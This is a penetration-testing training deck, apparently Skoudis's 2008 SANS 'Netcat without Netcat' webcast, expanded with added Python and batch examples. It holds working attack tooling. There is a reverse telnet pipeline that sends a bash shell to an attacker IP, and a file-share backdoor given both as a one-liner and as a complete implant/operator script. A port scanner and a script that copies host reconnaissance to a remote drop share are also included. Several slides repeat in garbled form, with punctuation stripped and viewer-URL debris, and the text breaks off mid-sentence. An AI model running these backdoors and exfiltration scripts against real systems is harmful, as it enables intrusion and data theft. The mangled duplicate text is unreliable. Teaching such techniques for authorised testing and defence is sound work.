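Reading the ports.txt this loop leaves behind is the part the slide calls "a little ugly", so here is an added example (not from the original slides) that does the triage: it groups the log by its "Checking Port N:" markers and classifies each port from what the ftp client wrote to Standard Error. Nothing after a marker means the client connected, a connection-refused line means closed, a time-out means filtered. The error strings and the sample log are constructed to resemble the Windows ftp client's connect messages; they are an assumption, not captured output.

```python
import re

# The scan loop writes "Checking Port N:" before each attempt (echo leaves a
# trailing space before the >>; strip() below takes care of it).
MARKER = re.compile(r"^Checking Port (\d+):$")

# Constructed sample of ports.txt. The ftp error lines are modeled on the
# Windows ftp client's connect messages (assumption, not a real capture).
SAMPLE_LOG = """Checking Port 21:
Checking Port 22:
> ftp: connect :Connection refused
Checking Port 23:
> ftp: connect :Connection refused
Checking Port 80:
Checking Port 135:
> ftp: connect :Connection timed out
Checking Port 139:
> ftp: connect :Unknown error number
"""


def classify_ports(log_text):
    """Return {port: state}; state is 'open', 'closed', 'filtered' or 'unknown'."""
    states = {}
    current = None
    for raw in log_text.splitlines():
        line = raw.strip()
        m = MARKER.match(line)
        if m:
            current = int(m.group(1))
            states[current] = "open"      # provisional: no error from ftp seen yet
            continue
        if current is None or not line:
            continue                      # stray text before the first marker
        low = line.lower()
        if "refused" in low:
            states[current] = "closed"    # RST came back: nothing listening
        elif "timed out" in low:
            states[current] = "filtered"  # no answer at all: likely a firewall
        else:
            states[current] = "unknown"   # something else went wrong; look by hand
    return states


def open_ports(log_text):
    """Just the ports the ftp client managed to connect to, sorted."""
    return sorted(p for p, s in classify_ports(log_text).items() if s == "open")


if __name__ == "__main__":
    for port, state in sorted(classify_ports(SAMPLE_LOG).items()):
        print(f"{port:5d} {state}")
```

Run it against a real ports.txt by reading the file into classify_ports; a port the loop was still stuck on when you killed it will have no marker after it and therefore still reads as open, so check the tail of the log before trusting the last entry.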


Windows Command-Line File Transfer

• File transfer on arbitrary ports is hard.
• But we can use Windows file and print sharing on the command line, redirecting to shares:
  – C:\> type [filename] > \\[machine]\[share]\[filename]
• This will use the current user's credentials…
• Or, if you want different credentials, first do a:
  – C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here:
  – Because we can redirect the output of commands across the network, not just files.


File Transfer in Action


Backdoors: The File Shell

• Now let's do a backdoor.
• Listening on a port is hard…
• But we can look in the file system.
• A FOR loop can spin looking for a command in a file, run the command, and dump the output to another file:
  – C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
• How it works: the outer loop (step 0) never ends. On each pass FOR /F reads commands.txt line by line; "delims=^" puts the whole line in %j rather than only its first space-separated token, cmd.exe /c runs the line and appends its Standard Out to output.txt, and del removes the command file so the same line isn't run again. The ping gives about a one-second pause between polls. While no commands.txt exists, FOR /F just prints a file-not-found message and the loop keeps spinning.
• Caveats: FOR /F skips blank lines and lines beginning with ";" (its default eol character); only Standard Out is captured (add 2>&1 after output.txt if you want Standard Error as well); and whoever can write commands.txt runs commands with the privileges of the loop, so the share's permissions are the backdoor's only access control.


Using the File Shell

• Now we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block…
  – Other folks are starting to use it, extending the idea.
  – Use the FTP client to move commands on arbitrary ports, writing them into the file system.
  – Or rely on nslookup to pull domain names that include commands.
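The same polling protocol as a portable Python model, added here as an example (it is not the slide's own cmd.exe one-liner) so that both halves can be run and read together: the implant side does what the nested FOR loops do, and the operator side does the echo-into-commands.txt and type-output.txt steps from this slide. File names follow the slide; the temp-then-rename write, the bounded poll count and the temp directory standing in for the share are assumptions added so the demo is safe and terminates.

```python
import os
import subprocess
import tempfile

COMMAND_FILE = "commands.txt"   # names follow the slide
OUTPUT_FILE = "output.txt"


def serve_once(share_dir):
    """Implant side, one pass of the outer FOR /L loop. Returns lines run."""
    cmd_path = os.path.join(share_dir, COMMAND_FILE)
    out_path = os.path.join(share_dir, OUTPUT_FILE)
    if not os.path.exists(cmd_path):
        return 0      # the cmd.exe loop just prints a not-found error here and spins again
    with open(cmd_path, "r", encoding="utf-8") as f:
        lines = [ln.rstrip("\r\n") for ln in f]
    ran = 0
    with open(out_path, "a", encoding="utf-8") as out:
        for line in lines:
            # FOR /F skips blank lines and lines starting with ';' (its default eol)
            if not line.strip() or line.startswith(";"):
                continue
            # cmd.exe /c %j >> output.txt, except that stderr is appended too
            proc = subprocess.run(line, shell=True, capture_output=True, text=True)
            out.write(f"> {line}\n{proc.stdout}{proc.stderr}")
            ran += 1
    os.remove(cmd_path)    # the slide's `del commands.txt`: never run the same file twice
    return ran


def send_commands(share_dir, commands):
    """Operator side: queue commands, one per line. Writing to a temp name and
    renaming is an added guard so the implant never reads a half-written file."""
    final = os.path.join(share_dir, COMMAND_FILE)
    tmp = final + ".tmp"
    with open(tmp, "w", encoding="utf-8") as f:
        f.write("\n".join(commands) + "\n")
    os.replace(tmp, final)


def read_output(share_dir):
    """Operator side: the slide's `type` of output.txt over the share."""
    out_path = os.path.join(share_dir, OUTPUT_FILE)
    if not os.path.exists(out_path):
        return ""
    with open(out_path, "r", encoding="utf-8") as f:
        return f.read()


def round_trip(commands, polls=3):
    """Full exchange in a temp dir standing in for \\host\share.
    Returns (lines_run, output_text, command_file_left_behind)."""
    share = tempfile.mkdtemp()
    send_commands(share, commands)
    ran = sum(serve_once(share) for _ in range(polls))   # later polls find nothing queued
    left = os.path.exists(os.path.join(share, COMMAND_FILE))
    return ran, read_output(share), left


if __name__ == "__main__":
    print(round_trip(["echo file shell alive", "; a comment line", "echo second"])[1])
```

Two edge cases carried over from the one-liner are worth knowing. If the operator writes a new commands.txt between the implant's read and its del, that command is deleted unread, so wait for output.txt to grow before queuing the next command. And the implant runs whatever it finds with its own privileges, which is exactly why a defender watching a share should care about a commands.txt that keeps appearing and vanishing.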


The File Shell In Action


Outline

• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A


Conclusions

• Netcat without Netcat shows that, with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box.
• Defenders need to be able to interpret attackers' actions and anticipate their moves.
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects.
• Netcat without Netcat serves these goals.


Follow-Up

• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code PENTEST20
• Discount applies to the 560 course through August:
  – June 4-9, Las Vegas, NV: Skoudis
  – June 12-July 22, Home (On-Line): Skoudis
  – July 24-29, Wash DC: Skoudis
  – Aug 11-16, Boston: Shackleford
  – Aug 18-23, Minneapolis: Conrad
  – Aug 24-29, Va Beach: Strand
• Go to www.sans.org and look for "560" for details


Outline

• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: the third webcast in this series of three will be on August 21, 2008

Page 21: Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat


Command-Line Port Scanner In Action

(Screenshot of the scanner running; the only text that survived extraction is a result line reading "5 Not Closed".)


Linux Command-Line Backdoor via "Reverse Telnet"

• There's a whole different way we can get a remote shell without using /dev/tcp.
• Linux telnet clients let us redirect Standard In and Standard Out.
• This gives rise to "reverse telnet".
• On the target machine, we could run:
  $ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]
• Provide commands on the attacker's machine via port1: whatever the first telnet client receives is fed to bash's Standard In.
• Receive output on the attacker's machine on port2: bash's Standard Out is fed to the second telnet client, which sends it back.
• The attacker therefore runs two listeners, one per port, and both channels are cleartext TCP.
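The exchange described above, with Python sockets standing in for the two telnet clients and subprocess standing in for /bin/bash, added as an example that is not part of the original slides. It runs the whole two-channel round trip on 127.0.0.1 with no telnet binary (ephemeral ports chosen at run time are an assumption so it runs anywhere), which makes the shape visible: the attacker needs two listeners, commands flow in over port1, output flows back over port2, and the shell only sees the command stream until the first telnet client hits end of file.

```python
import socket
import subprocess
import threading


def target_side(host, port1, port2):
    """What `telnet host port1 | /bin/bash | telnet host port2` does on the
    target: read commands from port1, run them, push the output to port2."""
    cmd_sock = socket.create_connection((host, port1))   # first telnet client
    out_sock = socket.create_connection((host, port2))   # second telnet client
    chunks = []
    while True:                      # bash reads stdin until the first telnet hits EOF
        data = cmd_sock.recv(4096)
        if not data:
            break
        chunks.append(data)
    cmd_sock.close()
    script = b"".join(chunks).decode()
    for line in script.splitlines():
        if not line.strip():
            continue
        proc = subprocess.run(line, shell=True, capture_output=True, text=True)
        # Only Standard Out travels to port2, exactly as in the slide's pipeline;
        # bash's Standard Error stays on the target unless 2>&1 is inserted.
        out_sock.sendall(proc.stdout.encode())
    out_sock.close()                 # EOF tells the attacker the output is complete


def operator_side(commands):
    """Attacker's two listeners. Returns (port1, port2, received_output)."""
    l1 = socket.socket()
    l1.bind(("127.0.0.1", 0))        # port 0: let the OS pick a free port
    l1.listen(1)
    l2 = socket.socket()
    l2.bind(("127.0.0.1", 0))
    l2.listen(1)
    port1, port2 = l1.getsockname()[1], l2.getsockname()[1]

    # Stand in for the target running the pipeline against our listeners.
    t = threading.Thread(target=target_side, args=("127.0.0.1", port1, port2), daemon=True)
    t.start()

    conn1, _ = l1.accept()           # command channel
    conn1.sendall(("\n".join(commands) + "\n").encode())
    conn1.close()                    # closing it is what ends bash's input

    conn2, _ = l2.accept()           # output channel
    received = []
    while True:
        data = conn2.recv(4096)
        if not data:
            break
        received.append(data)
    conn2.close()
    l1.close()
    l2.close()
    t.join(timeout=10)
    return port1, port2, b"".join(received).decode()


def run_demo():
    """One command through both channels; returns what came back on port2."""
    return operator_side(["echo reverse telnet works"])[2]


if __name__ == "__main__":
    print(run_demo(), end="")
```

In the real pipeline you would replace the two sockets with two separate listeners on the attacker's box (one to type into, one to watch), and the split is what makes this shape recognisable on the wire: a single host opening two outbound connections to the same peer within the same second, one carrying shell syntax inbound and the other carrying command output outbound, all in cleartext.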


Reverse Telnet Shell in Action


Windows

• The built-in command line has very clunky syntax.
• Also, the telnet and ftp clients are absolutely atrocious.
  – Especially in the way that they (don't) interact with Standard In and Standard Out.
• Thus, we will build Netcat-without-Netcat from some fundamental command-line building blocks in Windows.


Building Blocks: Windows FOR Loops

• Iteration can be very helpful.
  – We're not expecting you to be programmers.
  – But sometimes you'll want to iterate over a given set of items:
    • Numbers
    • Lines in a file
• The Windows command line supports several kinds of FOR loops… some of the most useful are:
  – FOR /L: counter
  – FOR /F: iterate over file contents, strings, or command output
• See the first webcast in this series for details on how these work… we won't go through them again here.



Page 23: Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23

Reverse Telnet Shell in Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24

Windowsbull Built-in command-line has very clunky syntax

bull Also telnet and ftp clients are absolutelyatrocious

ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out

bull Thus we will build Netcat-without-Netcat

from some fundamental command-linebuilding blocks in Windows

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25

Building Blocks

Windows FOR Loopsbull Iteration can be very helpful

ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of

itemsbull Numbers

bull Lines in a file

bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter

ndash FOR F Iterate over file contents strings or commandoutput

bull See the first webcast in this series for details on how

these workhellip we wonrsquot go through them again here

Windows Port Scanner Using

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26

Windows Port Scanner Using

Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i

bull Problem When it finds an open port it hangsbull How to address

ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume

ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where

name=telnetexe delete amp ping -n 6 127001

ndash Downside Race condition may kill one that hasnrsquot finished checking

M P bl ith Wi d

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27

More Problems with Windows Telnet Client as a Port Scanner

• Other problems:
  – Results aren't logged
    • You can't do anything with Standard Out of the telnet client
    • Attempts at redirection either make it hang or not run
    • And the logging option of the Windows telnet client (-f [filename]) overwrites all earlier logs… no append option
    • So you have to watch it, sadly
  – Most versions of Vista do not include the telnet client by default
    • But Netcat without Netcat is about living off the land
• There must be a better way…


Windows Port Scanner Using FTP Client

• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can't specify the port to connect to on the invocation command line… it only connects to TCP port 21
• Solution: But you can specify the destination port in an FTP command file:
  – open [IPaddr] [port]
• Then, the ftp client can read the contents of that file and do what it says by being invoked with:
  – C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration


The Windows Command Line Port Scanner Using FTP Client

• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
• Problem: It hangs for about 30 seconds on an open port, then moves on
  – That's not so bad
• Another problem: It doesn't store results
  – We can fix that, but it gets a little ugly


Making It Store Results

• C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt
• The ftp client writes its connection error for a closed port to Standard Error, which is what the 2>> redirect appends under the matching "Checking Port" line; a port with no error line after it is the interesting one
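The same ftp -s: trick as a complete batch script, with the verdict parsed out of the client's output instead of being eyeballed in ports.txt. This is an added example, not code from the original deck. The file names (ftp.txt, ftpout.txt, ports.txt, open.txt) are arbitrary, and the one real assumption is the "Connection refused" text the Windows ftp client prints for a closed port; check it once against a known-closed port before trusting the verdicts.

```batch
@echo off
rem ftpscan.bat - added example built on the ftp -s: trick in these slides;
rem it is not part of the original deck.
rem Usage:  ftpscan.bat TARGET FIRSTPORT LASTPORT
rem Writes ports.txt with one verdict per port and open.txt with only the
rem ports that did not refuse the connection. All file names are arbitrary.
rem Inside a .bat file FOR variables are written %%i; the slides' interactive
rem one-liners use %i.
setlocal
set "TARGET=%~1"
set "FIRST=%~2"
set "LAST=%~3"
if "%LAST%"=="" (
    echo usage: %~nx0 TARGET FIRSTPORT LASTPORT
    exit /b 1
)
if exist ports.txt del ports.txt
if exist open.txt del open.txt

for /L %%i in (%FIRST%,1,%LAST%) do call :probe %%i
echo done: verdicts in ports.txt, candidates in open.txt
exit /b 0

:probe
rem %1 is the port. Build the command file: the destination port rides on the
rem "open" line because ftp.exe will not accept a port on its own command line.
> ftp.txt echo open %TARGET% %1
>> ftp.txt echo quit
rem -n suppresses auto-login, so a real FTP server cannot park the client at a
rem username prompt. stdout and stderr are captured together so the verdict
rem does not depend on which stream the client uses for its error text.
ftp -n -s:ftp.txt > ftpout.txt 2>&1
rem Assumption: a closed port is reported as "connect :Connection refused".
rem Confirm that string once against a known-closed port on your build.
rem find sets errorlevel 0 when the string is present and 1 when it is absent;
rem no refusal means the connect succeeded or timed out, i.e. open or filtered.
find /i "refused" ftpout.txt > nul
if errorlevel 1 (
    echo %1 open/filtered >> ports.txt
    echo %1 >> open.txt
) else (
    echo %1 closed >> ports.txt
)
del ftp.txt ftpout.txt
goto :eof
```

Because the ftp client blocks for roughly 30 seconds on every port that does not refuse, a full 1-1024 sweep of a host with many listeners is slow; start with a short range. The "open/filtered" verdict is deliberately honest: the absence of a refusal cannot tell a listener from a silently dropped SYN.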


Windows Command-Line File Transfer

• File transfer on arbitrary ports is hard
• But, we can use Windows file and print sharing on the command line, redirecting to shares:
  – C:\> type [filename] > \\[machine]\[share]\[filename]
• Will use current user credentials…
• Or, if you want different credentials, first do a:
  – C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
  – Because we can redirect the output of commands across the network, not just files
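A worked version of the redirect-to-a-share idea, added here as an example rather than taken from the slides: it sends the output of several built-in commands straight into a file on a remote share, pulls a file back the same way, and maps and unmaps credentials only when they are supplied. \\DROPHOST\share, the credential arguments and the tools.txt file name are placeholders.

```batch
@echo off
rem collect.bat - added example, not from the original slides. It applies the
rem redirect-to-a-share trick to push command output, not just files, across
rem the network, and to pull a file back the same way.
rem Usage:  collect.bat \\DROPHOST\share [user] [password]
rem \\DROPHOST\share and the optional credentials are placeholders.
setlocal
set "SHARE=%~1"
if "%SHARE%"=="" (
    echo usage: %~nx0 \\DROPHOST\share [user] [password]
    exit /b 1
)
rem With no credentials the current logon token is used, as the slide says;
rem otherwise map the share explicitly first and stop if that fails.
if not "%~2"=="" (
    net use %SHARE% %~3 /u:%~2 || exit /b 2
)
rem Name the drop file after this host so several targets can share one drop.
set "DEST=%SHARE%\%COMPUTERNAME%.txt"
> "%DEST%" echo === %COMPUTERNAME% %DATE% %TIME% ===
rem Each command writes straight to the UNC path; nothing lands on local disk.
>> "%DEST%" ipconfig /all
>> "%DEST%" netstat -nao
>> "%DEST%" tasklist /v
rem A file goes the same way with type, the equivalent of the copy the slide
rem mentions.
if exist "%SystemRoot%\system32\drivers\etc\hosts" type "%SystemRoot%\system32\drivers\etc\hosts" >> "%DEST%"
rem Pulling is the mirror image: type the remote file into a local one.
if exist "%SHARE%\tools.txt" type "%SHARE%\tools.txt" > tools.txt
rem Drop the mapping again if this script created it.
if not "%~2"=="" net use %SHARE% /delete
echo wrote %DEST%
exit /b 0
```

Every write here is an SMB session to the drop host, so on a monitored network the same thing that makes it convenient makes it visible: file-share auditing (Security event 5145) records the UNC path, the account and the file name for each access.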


File Transfer in Action


Backdoors: The File Shell

• Now, let's do a backdoor
• Listening on a port is hard…
• But, we can look in the file system
• A FOR loop can spin looking for a command in a file, run the command, and dump output to another file:
  – C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1


Using the File Shell

• Now, we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block…
  – Other folks are starting to use it, extending the idea
  – Use the FTP client to move commands on arbitrary ports, writing them into the file system
  – Or rely on nslookup to pull domain names that include commands
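The file shell as a two-ended, runnable script. This is an added example, not code from the original slides; it wraps the one-liner from the previous slide into a .bat that can play either the implant or the operator role. \\TARGET\share, commands.txt and output.txt are placeholder names, and the script assumes the operator can already write to that UNC path (map it with net use from the file-transfer slide if the current credentials are not enough).

```batch
@echo off
rem fileshell.bat - added example, not from the original slides. One script
rem plays both ends of the file shell described above:
rem   fileshell.bat implant
rem       run on the target, inside the directory that is exposed as a share
rem   fileshell.bat run \\TARGET\share "whoami /all"
rem       run from the operator's box; \\TARGET\share is a placeholder UNC
rem       path you can already write to
rem Inside a .bat file FOR variables are written %%j; the slide's interactive
rem one-liner uses %j.
if /i "%~1"=="implant" goto implant
if /i "%~1"=="run" goto run
echo usage: %~nx0 implant ^| run \\TARGET\share "command"
exit /b 1

:implant
rem Poll about once a second. When commands.txt appears, run every line with
rem cmd.exe /c, append stdout and stderr to output.txt, and only then delete
rem the file, so the operator can treat "commands.txt is gone" as "output.txt
rem is complete". "delims=" makes the whole line one token; the slide's
rem "delims=^" has the same effect. The FOR is kept out of parentheses so a
rem tasked command containing a closing bracket cannot end the block early.
:poll
if not exist commands.txt goto sleep
for /f "usebackq delims=" %%j in ("commands.txt") do cmd.exe /c %%j >> output.txt 2>&1
del commands.txt
:sleep
ping -n 2 127.0.0.1 > nul
goto poll

:run
setlocal EnableDelayedExpansion
set "SHARE=%~2"
set "COMMAND=%~3"
if "!COMMAND!"=="" (
    echo usage: %~nx0 run \\TARGET\share "command"
    exit /b 1
)
rem Delayed expansion keeps & ^| ^< ^> inside the command from being parsed on
rem this side, so they reach the implant as text and run there. A literal !
rem is the one character this cannot carry.
> "%SHARE%\commands.txt" echo !COMMAND!
rem Wait for the implant to consume the command; give up after about 60 s.
set /a TRIES=0
:wait
ping -n 2 127.0.0.1 > nul
if not exist "%SHARE%\commands.txt" goto show
set /a TRIES+=1
if !TRIES! lss 60 goto wait
echo implant did not pick up the command within 60 seconds
exit /b 2
:show
type "%SHARE%\output.txt"
del "%SHARE%\output.txt"
exit /b 0
```

Two things are worth knowing before relying on it. The exchange is racy by design: the operator's echo and the implant's poll can interleave, so a very large command file could be read before it is fully written (single-line commands, as here, are written in one go). And from the defender's side it is noisy: the implant is a long-lived cmd.exe that launches ping.exe against 127.0.0.1 about once a second and a fresh cmd.exe /c child for each tasked command, while every command and result crosses the wire as a file write to a share, so process-creation logging (Security event 4688 or Sysmon event 1) and share-access auditing (event 5145) both see it.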


The File Shell In Action


Outline

• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A


Conclusions

• Netcat without Netcat shows that with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals


Follow-Up

• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20
• Discount applies to the 560 course through August:
  – June 4-9, Las Vegas, NV: Skoudis
  – June 12-July 22, Home On-Line: Skoudis
  – July 24-29, Wash DC: Skoudis
  – Aug 11-16, Boston: Shackleford
  – Aug 18-23, Minneapolis: Conrad
  – Aug 24-29, Va Beach: Strand
• Go to www.sans.org and look for "560" for details


Outline

• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008

Page 24: Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24

Windowsbull Built-in command-line has very clunky syntax

bull Also telnet and ftp clients are absolutelyatrocious

ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out

bull Thus we will build Netcat-without-Netcat

from some fundamental command-linebuilding blocks in Windows

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25

Building Blocks

Windows FOR Loopsbull Iteration can be very helpful

ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of

itemsbull Numbers

bull Lines in a file

bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter

ndash FOR F Iterate over file contents strings or commandoutput

bull See the first webcast in this series for details on how

these workhellip we wonrsquot go through them again here

Windows Port Scanner Using

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26

Windows Port Scanner Using

Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i

bull Problem When it finds an open port it hangsbull How to address

ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume

ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where

name=telnetexe delete amp ping -n 6 127001

ndash Downside Race condition may kill one that hasnrsquot finished checking

M P bl ith Wi d

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27

More Problems with Windows

Telnet Client as a Port Scannerbull Other problems

ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client

ndash Attempts at redirection either make it hang or not run

bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option

bull So you have to watch it sadly

ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land

bull There must be a better way

Wi d P t S U i

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28

Windows Port Scanner Using

FTP Clientbull Windows FTP client Cgt ftp [IPaddr]

bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21

bull Solution But you can specify dest port in an FTP

command file ndash open [IPaddr] [port]

bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]

bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file

displaying or storing results at each iteration

Th Wi d C d Li

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29

The Windows Command Line

Port Scanner Using FTP Clientbull Cgt for L i in (111024) do

echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt

bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad

bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly

Making It Store Results

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30

Making It Store Resultsbull Cgt for L i in

(111024) do

echo Checking

Port i gtgt

portstxt amp echoopen [IP_addr] i

gt ftptxt amp echo

quit gtgt ftptxt ampftp -sftptxt

2gtgtportstxt

Windows Command Line File Transfer

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31

Windows Command-Line File Transfer

bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on

the command line redirecting to shares

bull Cgt type [filename] gt[machine][share][filename]

bull Will use current user credentialshellip

bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]

bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands

across the network not just files

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32

File Transfer in Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33

Backdoors The File Shellbull Now letrsquos do a backdoor

bull Listening on a port is hardhellipbull But we can look in the file system

bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file

bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34

Using the File Shell

bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt

bull And we can read results by using type to read[IP_addr][share]outputtxt

bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea

ndash Use FTP client to move commands on arbitrary portswriting them into the file system

ndash Or rely on nslookup to pull domain names that includecommands

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35

The File Shell In Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36

Outline

bull Building a Penetration TestInfrastructure

bull Netcat without Netcatbull Conclusions

bull QampA

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37

Conclusionsbull Netcat without Netcat shows that with only individual
